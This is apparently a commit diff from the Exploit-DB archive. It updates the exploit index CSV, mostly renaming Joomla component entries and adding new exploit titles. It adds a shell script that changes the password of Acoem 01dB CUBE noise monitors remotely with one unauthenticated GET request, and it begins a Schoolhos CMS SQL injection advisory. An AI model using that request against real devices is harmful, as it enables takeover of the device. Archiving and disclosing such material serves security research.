12577,platforms/php/webapps/12577.txt,"Marinet CMS - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-11,CoBRa_21,php,webapps,0
|
||||
12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
|
||||
12579,platforms/php/webapps/12579.txt,"Joomla! Component Custom PHP Pages com_PHP - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps,0
|
||||
12579,platforms/php/webapps/12579.txt,"Joomla! Component 'com_PHP' 0.1 - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps,0
|
||||
12580,platforms/windows/remote/12580.txt,"MiniWebsvr 0.0.10 - Directory Traversal / Listing",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
|
||||
|
@ -11494,50 +11494,50 @@ id,file,description,date,author,platform,type,port
|
|||
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps,0
|
||||
12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",linux,remote,21
|
||||
12588,platforms/linux/dos/12588.txt,"Samba - Multiple Denial of Service Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0
|
||||
12590,platforms/php/webapps/12590.txt,"Joomla! Component com_konsultasi - 'sid' SQL Injection",2010-05-13,c4uR,php,webapps,0
|
||||
12590,platforms/php/webapps/12590.txt,"Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection",2010-05-13,c4uR,php,webapps,0
|
||||
12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
12592,platforms/php/webapps/12592.txt,"Joomla! Component Advertising (com_aardvertiser) 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0
|
||||
12592,platforms/php/webapps/12592.txt,"Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0
|
||||
12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0
|
||||
12594,platforms/php/webapps/12594.txt,"Joomla! Component Seber Cart - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0
|
||||
12595,platforms/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
|
||||
12594,platforms/php/webapps/12594.txt,"Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0
|
||||
12595,platforms/php/webapps/12595.txt,"Joomla! Component 'com_dioneformwizard' - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
|
||||
12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
|
||||
12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
|
||||
12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
|
||||
12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0
|
||||
14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0
|
||||
12601,platforms/php/webapps/12601.txt,"Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
|
||||
12601,platforms/php/webapps/12601.txt,"Joomla! Component 'com_jejob' 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
|
||||
12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0
|
||||
12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0
|
||||
12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0
|
||||
12607,platforms/php/webapps/12607.txt,"Joomla! Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0
|
||||
12607,platforms/php/webapps/12607.txt,"Joomla! Component 'com_jequoteform' - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0
|
||||
12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection",2010-05-14,CoBRa_21,php,webapps,0
|
||||
12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum - 'buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps,0
|
||||
12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0
|
||||
12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
|
||||
12611,platforms/php/webapps/12611.txt,"Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
|
||||
12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0
|
||||
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
|
||||
12614,platforms/windows/remote/12614.txt,"Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0
|
||||
12615,platforms/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
|
||||
12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
|
||||
12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0
|
||||
12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0
|
||||
12618,platforms/php/webapps/12618.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0
|
||||
12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0
|
||||
12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0
|
||||
12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - '.zip' Stack Buffer Overflow (PoC)",2010-05-16,sud0,windows,local,0
|
||||
12623,platforms/php/webapps/12623.txt,"Joomla! Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0
|
||||
12623,platforms/php/webapps/12623.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0
|
||||
12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0
|
||||
12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0
|
||||
12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0
|
||||
12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps,0
|
||||
12632,platforms/php/webapps/12632.txt,"Joomla! Component com_crowdsource - SQL Injection",2010-05-17,ByEge,php,webapps,0
|
||||
12633,platforms/php/webapps/12633.txt,"Joomla! Component com_event - Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0
|
||||
12632,platforms/php/webapps/12632.txt,"Joomla! Component 'com_crowdsource' - SQL Injection",2010-05-17,ByEge,php,webapps,0
|
||||
12633,platforms/php/webapps/12633.txt,"Joomla! Component 'com_event' - Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0
|
||||
12634,platforms/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,php,webapps,0
|
||||
12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,php,webapps,0
|
||||
12636,platforms/php/webapps/12636.txt,"MidiCart PHP/ASP - Arbitrary File Upload",2010-05-17,DigitALL,php,webapps,0
|
||||
12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection / Local File Inclusion / Cross-Site Scripting",2010-05-17,mr_me,php,webapps,0
|
||||
12639,platforms/php/webapps/12639.txt,"Joomla! Component com_event - SQL Injection",2010-05-17,anonymous,php,webapps,0
|
||||
12639,platforms/php/webapps/12639.txt,"Joomla! Component 'com_event' - SQL Injection",2010-05-17,anonymous,php,webapps,0
|
||||
12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - Cross-Site Request Forgery",2010-05-17,"John Leitch",windows,webapps,0
|
||||
12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,php,webapps,0
|
||||
12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,"cp77fk4r ",php,webapps,0
|
||||
|
@ -11546,7 +11546,7 @@ id,file,description,date,author,platform,type,port
|
|||
12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0
|
||||
12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0
|
||||
12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0
|
||||
12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
|
||||
12648,platforms/php/webapps/12648.txt,"Joomla! Component 'com_packages' - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
|
||||
12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0
|
||||
12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,"vir0e5 ",php,webapps,0
|
||||
12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 - Hack GENOCIDE Environment Overflow (PoC)",2010-05-18,JMIT,netbsd_x86,dos,0
|
||||
|
@ -11620,7 +11620,7 @@ id,file,description,date,author,platform,type,port
|
|||
12720,platforms/php/webapps/12720.txt,"Schaf-CMS 1.0 - SQL Injection",2010-05-24,Manas58,php,webapps,0
|
||||
12721,platforms/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,php,webapps,0
|
||||
12722,platforms/php/webapps/12722.txt,"interuse Website Builder & design - 'index2.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps,0
|
||||
12723,platforms/php/webapps/12723.py,"Joomla! Component com_qpersonel - SQL Injection Remote Exploit",2010-05-24,"Valentin Hoebel",php,webapps,0
|
||||
12723,platforms/php/webapps/12723.py,"Joomla! Component 'com_qpersonel' 1.0 - SQL Injection",2010-05-24,"Valentin Hoebel",php,webapps,0
|
||||
12724,platforms/php/webapps/12724.php,"WebAsys - Blind SQL Injection",2010-05-24,zsh.shell,php,webapps,0
|
||||
12725,platforms/php/webapps/12725.txt,"ALSCO CMS - SQL Injection",2010-05-24,PrinceofHacking,php,webapps,0
|
||||
12726,platforms/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -14524,7 +14524,7 @@ id,file,description,date,author,platform,type,port
|
|||
16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
|
||||
16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
|
||||
16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
|
||||
16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21
|
||||
16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21
|
||||
16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
|
||||
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100
|
||||
16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
|
||||
|
@ -16307,7 +16307,7 @@ id,file,description,date,author,platform,type,port
|
|||
18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0
|
||||
18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
|
||||
18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0
|
||||
18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86) - Code Execution",2012-05-11,0in,windows,local,0
|
||||
18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,windows,local,0
|
||||
18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0
|
||||
18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0
|
||||
18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0
|
||||
|
@ -19448,7 +19448,7 @@ id,file,description,date,author,platform,type,port
|
|||
22153,platforms/php/webapps/22153.pl,"Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection",2012-10-22,D35m0nd142,php,webapps,0
|
||||
22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0
|
||||
22156,platforms/php/webapps/22156.txt,"Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0
|
||||
22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0
|
||||
22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - 'id' Parameter SQL Injection",2012-10-22,Cumi,php,webapps,0
|
||||
22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0
|
||||
22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
|
||||
22160,platforms/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -20918,7 +20918,7 @@ id,file,description,date,author,platform,type,port
|
|||
23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0
|
||||
23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local,0
|
||||
23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0
|
||||
23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0
|
||||
23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0
|
||||
23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
|
||||
23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0
|
||||
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
|
||||
|
@ -30581,7 +30581,7 @@ id,file,description,date,author,platform,type,port
|
|||
33880,platforms/windows/remote/33880.rb,"Cogent DataHub - Command Injection (Metasploit)",2014-06-25,Metasploit,windows,remote,0
|
||||
33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0
|
||||
33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
|
||||
33998,platforms/php/webapps/33998.html,"Joomla! Component JoomlaTune JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
|
||||
33998,platforms/php/webapps/33998.html,"Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
|
||||
33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow",2010-04-13,"Luigi Auriemma",multiple,remote,0
|
||||
33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,windows,remote,0
|
||||
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
|
||||
|
@ -30723,12 +30723,12 @@ id,file,description,date,author,platform,type,port
|
|||
34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0
|
||||
34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0
|
||||
34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0
|
||||
34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34003,platforms/php/webapps/34003.txt,"Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34004,platforms/php/webapps/34004.txt,"Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34005,platforms/php/webapps/34005.txt,"Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34006,platforms/php/webapps/34006.txt,"Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
|
||||
34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34008,platforms/php/webapps/34008.txt,"Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010
|
||||
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
|
||||
34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0
|
||||
|
@ -30739,7 +30739,7 @@ id,file,description,date,author,platform,type,port
|
|||
34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 - Firmware setup_ddns.exe HTML Injection",2010-05-20,SH4V,hardware,remote,0
|
||||
34021,platforms/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
|
||||
34021,platforms/php/webapps/34021.txt,"Joomla! Component 'com_horses' - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
|
||||
34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0
|
||||
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0
|
||||
34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,"ViRuSMaN ",php,webapps,0
|
||||
|
@ -36710,7 +36710,7 @@ id,file,description,date,author,platform,type,port
|
|||
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
|
||||
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
|
||||
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection (2)",2016-10-21,"Arbin Godar",php,webapps,0
|
||||
40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
|
||||
40614,platforms/php/webapps/40614.py,"FreePBX 13 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
|
||||
40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
|
||||
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
|
||||
40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
|
||||
|
@ -36800,4 +36800,11 @@ id,file,description,date,author,platform,type,port
|
|||
40712,platforms/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow",2016-11-04,Karri93,windows,remote,0
|
||||
40713,platforms/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0
|
||||
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
|
||||
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
|
||||
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
|
||||
40719,platforms/php/webapps/40719.txt,"Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection",2016-11-07,Vulnerability-Lab,php,webapps,0
|
||||
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
|
||||
40721,platforms/windows/remote/40721.html,"Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084)",2016-11-07,Skylined,windows,remote,0
|
||||
40722,platforms/windows/dos/40722.html,"Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
|
||||
40723,platforms/php/webapps/40723.txt,"NodCMS - PHP Code Execution",2016-11-07,"Ashiyane Digital Security Team",php,webapps,0
|
||||
40724,platforms/php/webapps/40724.txt,"Piwik 2.16.0 - 'layout' PHP Object Injection",2016-11-07,"Egidio Romano",php,webapps,80
|
||||
40725,platforms/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
37
platforms/hardware/remote/40720.sh
Executable file
37
platforms/hardware/remote/40720.sh
Executable file
|
@ -0,0 +1,37 @@
|
|||
#!/bin/sh
|
||||
#
|
||||
# Acoem 01dB CUBE Smart Noise Monitoring Terminal
|
||||
# Remote Password Change
|
||||
#
|
||||
# HW version: LIS001A
|
||||
# Application FW: 2.34
|
||||
# Metrology FW: 2.10
|
||||
# Modem FW: 12.00.005 / 08.01.108
|
||||
#
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev
|
||||
# <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
# Thanks to Maya Hristova that support me.
|
||||
|
||||
[todor@adamantium ~]$ GET "http://<TARGET>/ajax/F_validPassword.asp?NewPwd=<PASSWORD>"
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
=============================================================================================================
|
||||
|
||||
|
||||
|
|
174
platforms/php/webapps/40719.txt
Executable file
174
platforms/php/webapps/40719.txt
Executable file
|
@ -0,0 +1,174 @@
|
|||
Document Title:
|
||||
===============
|
||||
Schoolhos CMS v2.29 - (kelas) Data Siswa SQL Injection Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1931
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-11-07
|
||||
|
||||
|
||||
